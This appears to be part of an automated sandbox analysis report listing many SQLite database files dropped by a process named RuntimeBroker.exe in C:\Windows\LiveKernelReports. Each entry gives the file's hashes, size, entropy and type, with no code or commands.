                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
